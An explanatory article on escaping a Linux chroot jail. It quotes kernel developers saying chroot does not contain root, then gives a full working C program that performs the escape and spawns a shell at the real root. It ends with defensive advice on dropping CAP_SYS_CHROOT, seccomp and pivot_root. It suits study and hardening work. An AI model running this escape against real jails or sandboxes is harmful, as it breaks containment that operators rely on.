
Abusing chroot

“‘If you have the ability to use chroot() you are root. If you
are root you can walk happily out of any chroot by a thousand other
means,’ Alan Cox explained during a thread that suggested chroot
was broken in Linux. It was further pointed out that this was true
per the POSIX specification, and per other OSes’ implementations. Al
Viro suggested this should be added to the lkml FAQ,
explaining:

“‘If you are within chroot jail and capable of chroot(), you can
chdir to its root, then chroot() to subdirectory and you’ve got cwd
outside of your new root. After that you can chdir all the way out to
original root. Again, this is standard behaviour. Changing it will
not yield any security improvements, so kindly give that a
rest…'”
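The walk-out Al Viro describes, written out as a standalone C program. This is an added example, not code from the thread or from the article quoted above; the scratch directory name `.chroot_escape` and the 64-level climb are assumptions, and the program needs CAP_SYS_CHROOT (in practice, being root inside the jail) for the chroot() calls in steps 3 and 5 to succeed.

```c
/* chroot_escape.c -- walk out of a chroot jail when chroot() is permitted.
 * Added example, not from the quoted thread.
 * Build: cc -Wall -o chroot_escape chroot_escape.c
 * Requires CAP_SYS_CHROOT; without it step 3 fails with EPERM.
 */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Scratch directory created at the jail root (assumed name). */
#define SCRATCH_DIR ".chroot_escape"

/* Returns 0 if the root directory changed (a jail was escaped),
 * 1 if it did not ("/" was already the real root, nothing to escape),
 * -1 on failure with errno set (EPERM without CAP_SYS_CHROOT,
 * EACCES/EROFS if the jail root is not writable). */
int escape_chroot(void)
{
    struct stat before, after;
    int saved_errno;

    if (stat("/", &before) != 0)
        return -1;

    /* Step 1: make the jail's root our cwd. */
    if (chdir("/") != 0)
        return -1;

    /* Step 2: create a subdirectory to chroot() into. */
    if (mkdir(SCRATCH_DIR, 0700) != 0 && errno != EEXIST)
        return -1;

    /* Step 3: chroot() into the subdirectory. chroot() does not touch cwd,
     * so cwd (the old jail root) is now outside the new root. */
    if (chroot(SCRATCH_DIR) != 0) {
        saved_errno = errno;
        rmdir(SCRATCH_DIR);
        errno = saved_errno;
        return -1;
    }

    /* Step 4: walk upward. Path lookup pins ".." only when it reaches the
     * process root; cwd is not below that root, so each chdir("..") climbs
     * one level of the real tree. At the real root ".." is itself, so 64
     * iterations cover any realistic jail depth. */
    for (int i = 0; i < 64; i++)
        if (chdir("..") != 0)
            return -1;

    /* Step 5: make wherever we landed the new root. */
    if (chroot(".") != 0)
        return -1;

    /* Best-effort cleanup; only succeeds when jail root and real root coincide. */
    rmdir(SCRATCH_DIR);

    if (stat("/", &after) != 0)
        return -1;

    return (before.st_dev == after.st_dev && before.st_ino == after.st_ino) ? 1 : 0;
}

int main(void)
{
    int rc = escape_chroot();
    if (rc < 0) {
        fprintf(stderr, "escape failed: %s\n", strerror(errno));
        return 1;
    }
    puts(rc == 0 ? "escaped: root directory changed" : "root unchanged: not in a jail");
    execl("/bin/sh", "sh", (char *)NULL); /* shell at the real root */
    perror("execl");
    return 1;
}
```

The return value is decided by comparing the device and inode of "/" before and after, so the program reports whether a root change actually happened rather than assuming one. The practical point for anyone building a jail is the one Alan Cox makes: the defence is not a "fixed" chroot() but never letting the jailed process keep CAP_SYS_CHROOT (or root at all), for instance by dropping capabilities after the chroot or filtering the syscall with seccomp; containers avoid the problem by using mount namespaces and pivot_root instead of chroot.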
